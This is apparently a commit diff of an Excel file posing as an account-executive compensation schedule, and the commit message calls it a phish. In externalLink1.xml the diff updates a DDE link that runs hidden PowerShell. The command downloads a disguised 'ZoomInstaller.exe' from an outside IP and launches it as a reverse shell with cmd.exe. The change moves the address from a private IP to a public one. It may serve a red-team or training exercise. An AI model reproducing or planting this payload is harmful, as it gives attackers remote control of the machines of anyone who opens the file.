<commit_message>
Updated Excel sheet phish with new IP
</commit_message>
<xml_diff>
--- a/L1/Artifacts/AE_Compensation_Schedule.xlsx
+++ b/L1/Artifacts/AE_Compensation_Schedule.xlsx
@@ -1,16 +1,16 @@
 
 <file path=xl/workbook.xml><?xml version="1.0" encoding="utf-8"?>
 <workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xmlns:xr10="http://schemas.microsoft.com/office/spreadsheetml/2016/revision10" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" mc:Ignorable="x15 xr xr6 xr10 xr2">
-  <fileVersion appName="xl" lastEdited="7" lowestEdited="6" rupBuild="23328"/>
+  <fileVersion appName="xl" lastEdited="7" lowestEdited="6" rupBuild="23801"/>
   <workbookPr codeName="ThisWorkbook"/>
   <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
     <mc:Choice Requires="x15">
-      <x15ac:absPath xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac" url="C:\Users\timmyt\Desktop\"/>
+      <x15ac:absPath xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac" url="C:\Users\Louai\Desktop\C3X2021Engineering\L1\Artifacts\"/>
     </mc:Choice>
   </mc:AlternateContent>
-  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{BAFDEAC4-9F7A-4227-9FB8-064EBFE53A2F}" xr6:coauthVersionLast="45" xr6:coauthVersionMax="45" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
+  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{83907100-8A04-4824-B93D-E27F084E7813}" xr6:coauthVersionLast="46" xr6:coauthVersionMax="46" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
   <bookViews>
-    <workbookView xWindow="990" yWindow="585" windowWidth="21600" windowHeight="11385" tabRatio="839" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/>
+    <workbookView xWindow="-120" yWindow="-120" windowWidth="29040" windowHeight="15840" tabRatio="839" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/>
   </bookViews>
   <sheets>
     <sheet name="Compensation Plan" sheetId="1" r:id="rId1"/>
@@ -547,7 +547,7 @@
 
 <file path=xl/externalLinks/externalLink1.xml><?xml version="1.0" encoding="utf-8"?>
 <externalLink xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14="http://schemas.microsoft.com/office/spreadsheetml/2009/9/main" mc:Ignorable="x14">
-  <ddeLink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ddeService="cmd" ddeTopic="/c powershell.exe -Exec Bypass -NoProfile -WindowStyle Hidden -Command &quot;iwr http://10.10.99.7:80/ZoomInstaller.exe -OutFile $env:APPDATA\ZoomInstaller.exe; . $env:APPDATA\ZoomInstaller.exe 10.10.99.7 4444 -e cmd.exe&quot;">
+  <ddeLink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ddeService="cmd" ddeTopic="/c powershell.exe -Exec Bypass -NoProfile -WindowStyle Hidden -Command &quot;iwr http://191.232.179.179:8080/ZoomInstaller.exe -OutFile $env:APPDATA\ZoomInstaller.exe; . $env:APPDATA\ZoomInstaller.exe 191.232.179.179 4444 -e cmd.exe&quot;">
     <ddeItems>
       <ddeItem name="_xlbgnm.a1" advise="1"/>
       <ddeItem name="StdDocumentName" ole="1" advise="1"/>
@@ -782,8 +782,8 @@
   </sheetPr>
   <dimension ref="A1:AD17"/>
   <sheetViews>
-    <sheetView showGridLines="0" tabSelected="1" zoomScale="115" zoomScaleNormal="115" workbookViewId="0">
-      <selection activeCell="D15" sqref="D15"/>
+    <sheetView showGridLines="0" tabSelected="1" topLeftCell="P1" zoomScale="115" zoomScaleNormal="115" workbookViewId="0">
+      <selection activeCell="AD5" sqref="AD5"/>
     </sheetView>
   </sheetViews>
   <sheetFormatPr defaultRowHeight="30" customHeight="1" x14ac:dyDescent="0.2"/>

</xml_diff>